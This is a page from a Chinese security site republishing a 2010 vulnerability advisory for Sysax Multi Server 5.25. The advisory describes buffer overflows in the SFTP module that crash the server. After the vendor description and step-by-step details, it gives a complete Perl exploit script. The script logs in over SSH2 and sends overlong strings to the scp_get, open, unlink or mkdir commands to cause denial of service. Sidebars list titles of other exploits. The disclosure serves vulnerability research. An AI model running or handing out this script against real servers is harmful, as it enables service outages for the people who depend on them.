首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sysax Multi Server (SFTP module) Multiple Commands DoS Vulnerabilities
来源:leinakesi[at]gmail.com 作者:leinakesi 发布时间:2010-06-22  
[*]Title: Sysax Multi Server(SFTP module) "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities

[*]Product: Sysax Multi Server

[*]Vendor: Codeorigin, LLC

[*]Version: 5.25 (earlier versions may also be affected)

[*]Platform: Windows

[*]Type of Vulnerability: Buffer overflow -->DoS

[*]Risk rating: Medium

[*]Date of Discovery: 21-Jun-2010

[*]Discoverd by: leinakesi (leinakesi[at]gmail[dot]com)

Overview:

1.vendor description of software

------------------------------------------------

A SSH2 and FTP server for Microsoft windows® that enables system administrators to support multiple protocol access to user accounts. FTPS, SFTP, and HTTPS based file transfers are supported in addition to FTP, Telnet, and Secure Shell access. Sysax Multi Server lets system administrators authenticate users using existing windows user accounts or by creating custom accounts, or a combination of both methods. A convenient web browser based administration interface makes it easy to monitor the status of the server remotely.It is easy to install and does not require advanced IT skills to manage.

2.vulnerability details:

------------------------------------------------

Several Denial of Service vulnerabilities exist in SFTP module of Sysax Multi Server. The unsafe commands include "open","unlink", "mkdir" and etc. .which can not handle overlength strings properly.

If you could log on the server successfully, take the following steps and the Sysax Multi server will crash which would lead to Denial of Service attack:

#initialize $FUZZ = "A" x 1000

1. $ssh2 = Net::SSH2->new();

2. $ssh2->connect($server, $port);

3. $ssh2->auth_password($user, $pass);

#there are several ways to compromise the server, I list them here as 4.1, 4.2, and etc. ...

4.1 $scpget = $ssh2->scp_get($FUZZ);

4.2 $sftp = $ssh2->sftp(); $o1 = $sftp->open($FUZZ);

4.3 $sftp = $ssh2->sftp(); $u = $sftp->unlink(FUZZ);

4.4 $sftp = $ssh2->sftp(); $m = $sftp->mkdir($FUZZ);

5 $ssh2->disconnect();

Exploit example:

#!/usr/bin/perl

#leinakesi[at]gmail.com

#Sysax Multi Server "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities

use Net::SSH2;

use Getopt::Std;

$FUZZ = "A" x 1000;

getopts('S:P:u:p:', \%opts);

$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};

if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )

{

print "usage:\n\tperl test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";

print "\tperl test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";

exit(0);

}

$ssh2 = Net::SSH2->new();

$ssh2->connect($server, $port) || die "can not connect the server, please check.\n";

$ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n";

#any of the following commands will cause the server carsh.

$scpget = $ssh2->scp_get($FUZZ) || die "server crashed.\n";

# $sftp = $ssh2->sftp(); $o1 = $sftp->open($FUZZ);

# $sftp = $ssh2->sftp(); $u = $sftp->unlink(FUZZ);

# $sftp = $ssh2->sftp(); $m = $sftp->mkdir($FUZZ);

print "\nover\n";

$ssh2->disconnect();

exit(0);

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·cPanel Username look Remote Ex
·Teamspeak <= 3.0.0-beta25 Mult
·MoreAmp (.maf) local Stack Buf
·PHPWCMS 1.4.5 r389 Cross Site
·Safari 5.0 Denial of Service E
·Subtitle Translation Wizard v3
·Linux/x86-64 - Add root user w
·linux/x86-64 - DNS spoofing C
·MoreAmp (.maf) local Stack Buf
·Norex v1.3.2.0 Argument Heap-O
·Orbital Viewer v1.04 (.ov) Loc
·phpFK <= v7.0.5 Remote Code Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved